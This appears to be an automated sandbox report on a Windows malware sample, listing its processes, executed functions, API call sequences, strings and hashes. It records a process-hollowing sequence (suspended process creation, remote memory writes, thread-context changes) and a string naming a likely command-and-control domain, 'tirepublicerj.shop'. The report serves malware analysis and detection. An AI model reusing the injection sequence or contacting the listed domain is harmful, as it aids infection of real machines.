Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xb00000
File size:	390'696 bytes
MD5 hash:	E9F13D0B330A73ECE569B6115D2AC4F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:58:06
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160
Imagebase:	0x610000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	57.1%
Total number of Nodes:	14
Total number of Limit Nodes:	2

Executed Functions

Function 024F7F41 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024F7EB3,024F7EA3), ref: 024F80D9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024F80EC
Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 024F810A
ReadProcessMemory.KERNELBASE(00000388,?,024F7EF7,00000004,00000000), ref: 024F812E
VirtualAllocEx.KERNELBASE(00000388,?,?,00003000,00000040), ref: 024F8159
WriteProcessMemory.KERNELBASE(00000388,00000000,?,?,00000000,?), ref: 024F81B1
WriteProcessMemory.KERNELBASE(00000388,00400000,?,?,00000000,?,00000028), ref: 024F81FC
WriteProcessMemory.KERNELBASE(00000388,?,?,00000004,00000000), ref: 024F823A
Wow64SetThreadContext.KERNEL32(00000088,04970000), ref: 024F8276
ResumeThread.KERNELBASE(00000088), ref: 024F8285

Strings

WriteProcessMemory, xrefs: 024F8054
VirtualAlloc, xrefs: 024F8008
aryA, xrefs: 024F7F87
ReadProcessMemory, xrefs: 024F802E
TerminateProcess, xrefs: 024F8168
VirtualAllocEx, xrefs: 024F8041
CreateProcessW, xrefs: 024F7FF5
GetThreadContext, xrefs: 024F801B
ress, xrefs: 024F7FCB
Load, xrefs: 024F7F7F
GetP, xrefs: 024F7FC3
ResumeThread, xrefs: 024F807D
SetThreadContext, xrefs: 024F8067

Memory Dump Source

Source File: 00000000.00000002.1994591365.00000000024F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24f7000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: af067eca3e453f78f949477452acff514576a0720390f6372a2c01693ef7d8d7
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: E5B1177660064AAFDB60CF68CC80BDAB3A5FF88714F158125EA0CAB341D774FA51CB94

Function 024F80BE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024F7EB3,024F7EA3), ref: 024F80D9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024F80EC
Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 024F810A
ReadProcessMemory.KERNELBASE(00000388,?,024F7EF7,00000004,00000000), ref: 024F812E
VirtualAllocEx.KERNELBASE(00000388,?,?,00003000,00000040), ref: 024F8159
WriteProcessMemory.KERNELBASE(00000388,00000000,?,?,00000000,?), ref: 024F81B1
WriteProcessMemory.KERNELBASE(00000388,00400000,?,?,00000000,?,00000028), ref: 024F81FC
WriteProcessMemory.KERNELBASE(00000388,?,?,00000004,00000000), ref: 024F823A
Wow64SetThreadContext.KERNEL32(00000088,04970000), ref: 024F8276
ResumeThread.KERNELBASE(00000088), ref: 024F8285

Strings

TerminateProcess, xrefs: 024F8168

Memory Dump Source

Source File: 00000000.00000002.1994591365.00000000024F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24f7000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: TerminateProcess
API String ID: 2687962208-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 5d1be478efbbd8a6fedeac8927ff096e8b434248e1d4208b68cb2940b959e347
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: DB311C72240646ABD774CF54CC91FEA7365BFC8B15F148509EB09AF680C6B4BA418B94

Function 023628C1 Relevance: 1.7, APIs: 1, Instructions: 219
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(034F3588,?,?,?,?,?,?,?,?,0010D2FB,00000000,?,02360D9B,?,00000040), ref: 02362B49

Memory Dump Source

Source File: 00000000.00000002.1994431062.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3cfc12cfd8bda49e1d782d4534fe8fa490287938cd4bd8d956976775d01e2aeb
Instruction ID: 1d9a8eda8522721f831fcd857ae88f86764b4c43d09e88c39cd1654a353e9b2f
Opcode Fuzzy Hash: 3cfc12cfd8bda49e1d782d4534fe8fa490287938cd4bd8d956976775d01e2aeb
Instruction Fuzzy Hash: AC917A71A1415A8FCB11CFADC484AEEFBF1BF89310F69C655E858A7346C374A941CBA0

Function 023606E0 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(034F3588,?,?,?,?,?,?,?,?,0010D2FB,00000000,?,02360D9B,?,00000040), ref: 02362B49

Memory Dump Source

Source File: 00000000.00000002.1994431062.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cd8c0c5e1024ebdeb87ea6570eea7e4af8c4c63c385dfec5f1923d92d3332b3f
Instruction ID: 566b8b7c20ae98a856ff68194625873d2ad845f306ad1c6fee5fc6df4828247e
Opcode Fuzzy Hash: cd8c0c5e1024ebdeb87ea6570eea7e4af8c4c63c385dfec5f1923d92d3332b3f
Instruction Fuzzy Hash: 2221C4B5D0161DAFCB00DF9AD884ADEFBB8FB49310F10812AE918A7241D3756954CFA5

Analysis Process: file.exePID: 6664, Parent PID: 6496COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	48.7%
Total number of Nodes:	189
Total number of Limit Nodes:	16

Executed Functions

Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
SysAllocString.OLEAUT32 ref: 0043D608
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
SysAllocString.OLEAUT32 ref: 0043D6A8
SysAllocString.OLEAUT32 ref: 0043D765
VariantInit.OLEAUT32(?), ref: 0043D7D6
SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95

Strings

yv, xrefs: 0043D813
[J, xrefs: 0043D21D
fF, xrefs: 0043D5D0
{pqv, xrefs: 0043D120
tu, xrefs: 0043D5AC
CfF, xrefs: 0043D600
[B, xrefs: 0043D225

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: fF$CfF$[B$[J$tu$yv${pqv
API String ID: 505850577-1972840126
Opcode ID: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
Opcode Fuzzy Hash: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

Function 0040E16E Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040E17A

Strings

RYZ[, xrefs: 0040E52E
c[i!, xrefs: 0040E2CB
UGC9, xrefs: 0040E2E1
tirepublicerj.shop, xrefs: 0040E631
Zb, xrefs: 0040E188
yD, xrefs: 0040E29A

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: Uninitialize
String ID: RYZ[$UGC9$Zb$c[i!$tirepublicerj.shop$yD
API String ID: 3861434553-2489493371
Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96

Function 00421B30 Relevance: 9.3, Strings: 7, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00421DF2
p, xrefs: 00422161
v, xrefs: 00422159
!@, xrefs: 00421B6A
6, xrefs: 00421E02
q, xrefs: 00422169
,, xrefs: 00422090

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$0$6$p$q$v
API String ID: 1279760036-585546663
Opcode ID: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
Instruction ID: 8656d014051cfeae6f38fc6e5bc27d53fcdcc23dc9b32e8d9396b3c6709607b7
Opcode Fuzzy Hash: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
Instruction Fuzzy Hash: 0122DD7170C790CFD3248B28D58036BBBE1BB95324F558A2EE5E9873D1D7B988418B4B

Function 00408A60 Relevance: 7.7, APIs: 5, Instructions: 216
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A84
GetCurrentThreadId.KERNEL32 ref: 00408A8E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
GetForegroundWindow.USER32 ref: 00408B8B
ExitProcess.KERNEL32 ref: 00408D07

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

Function 0042F716 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65

Strings

5, xrefs: 0042FC83
bC, xrefs: 0042FD1D
Tx+, xrefs: 0042FD77

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 5$Tx+$bC
API String ID: 3960555810-2958649183
Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56

Function 0042FB7D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65

Strings

5, xrefs: 0042FC83
bC, xrefs: 0042FD1D
Tx+, xrefs: 0042FD77

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 5$Tx+$bC
API String ID: 3960555810-2958649183
Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56

Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DM_e, xrefs: 0040C083
'!, xrefs: 0040C119
Js, xrefs: 0040C0C1
FwPq, xrefs: 0040C0B9
50, xrefs: 0040C1AD

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 50$DM_e$FwPq$Js$'!
API String ID: 0-1711485358
Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

Function 00425713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743

Strings

67, xrefs: 00425B0C

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B

Function 00437C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00437C52
GetSystemMetrics.USER32 ref: 00437C62

Strings

, xrefs: 00437D4F

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A

Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PWPQ, xrefs: 00418BC7
bd\,, xrefs: 00418BB1
oQ, xrefs: 00418BD2
fnga, xrefs: 00418BBC

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: PWPQ$bd\,$fnga$oQ
API String ID: 0-3706350231
Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

Function 00428750 Relevance: 4.1, Strings: 3, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&76#, xrefs: 00428A72
/X, xrefs: 00428A82
BDE:, xrefs: 004287C2, 004287F2

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: &76#$/X$BDE:
API String ID: 2994545307-3468712750
Opcode ID: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
Instruction ID: de511f14106650819994a34559177bbffe3ae858db635c904efe7b47fdd347f8
Opcode Fuzzy Hash: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
Instruction Fuzzy Hash: 4C9146B27093119BD3109F25EC8176FB6D2EBC5318F58813EE4858B381EA3C9846878B

Function 00430F54 Relevance: 3.1, APIs: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00430F85
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86

Function 00430F4E Relevance: 3.1, APIs: 2, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00430F85
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86

Function 00415D89 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86

Function 00430F03 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6

Function 00444C20 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

Y\]R, xrefs: 00444E24

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: Y\]R
API String ID: 2994545307-2023185185
Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786

Function 00442080 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004442E0 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
Instruction ID: 5aabee4b8b26e2ec9a193049fa608abe716db33e51fa934c25155f6b19f8c581
Opcode Fuzzy Hash: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
Instruction Fuzzy Hash: AC9115316083018BEB14DF29D86072FB7E2FFC9724F15892DE9C597390D73898158B8A

Function 0042F4E1 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
Instruction ID: 9ecb6df6af24b1f74966394131ffdcc5ba7ea28be31435c304ffc82d0aba2bdf
Opcode Fuzzy Hash: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
Instruction Fuzzy Hash: 43519D22B457624BD7048A3898802A6BBA3DFD6361F9CC73FC491873D6DB7C980AC345

Function 0043CE90 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
Instruction ID: e35f2f60d65f04bb18af1f8d7cf5bd4ec7f66c51464b3c3842bee00e328901c8
Opcode Fuzzy Hash: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
Instruction Fuzzy Hash: 3B51F671A0C6018FD3188B28D59032BB7E2BBC9328F159B2FE4A5573D1D279C946CB4B

Function 00441B50 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96

Function 00441816 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

